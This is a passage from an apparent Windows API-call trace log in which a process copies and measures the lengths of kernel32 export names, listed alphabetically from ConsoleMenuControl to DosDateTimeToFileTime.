lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.130] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.130] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.130] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.130] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.130] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.130] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.131] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.131] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.131] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.131] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.131] lstrlenA (lpString="COPYFILEA") returned 9 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.131] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.131] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.131] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.131] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.131] lstrlenA (lpString="COPYFILEW") returned 9 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.131] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.131] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.131] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.131] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.131] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.131] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.131] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.131] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.131] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.132] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.132] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.132] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.132] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.132] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.132] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.132] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.132] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.132] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.132] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.132] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.132] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.132] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.132] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.132] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.132] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.132] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.132] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.132] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.133] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.133] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.133] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.133] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.133] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.133] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.133] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.133] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.133] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.133] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.133] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.133] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.133] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.133] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.133] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.133] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.133] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.133] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.134] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.134] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.134] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.134] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.134] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.134] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.134] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.134] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.134] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.134] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.134] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.134] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.134] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.134] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.134] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.134] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.134] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.134] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.134] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.135] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.135] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.135] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.135] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.135] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.135] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.135] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.135] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.135] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.135] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.135] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.135] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.135] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.135] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.135] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.135] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.135] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.135] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.136] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.136] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.136] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.136] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.136] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.136] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.136] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.136] lstrlenA (lpString="DELETEATOM") returned 10 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.136] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.136] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.136] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.136] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.136] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.136] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.136] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.136] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.136] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.136] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.137] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.137] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.137] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.137] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.137] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.137] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.137] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.137] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.137] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.137] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.137] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.137] lstrcpyA (in: 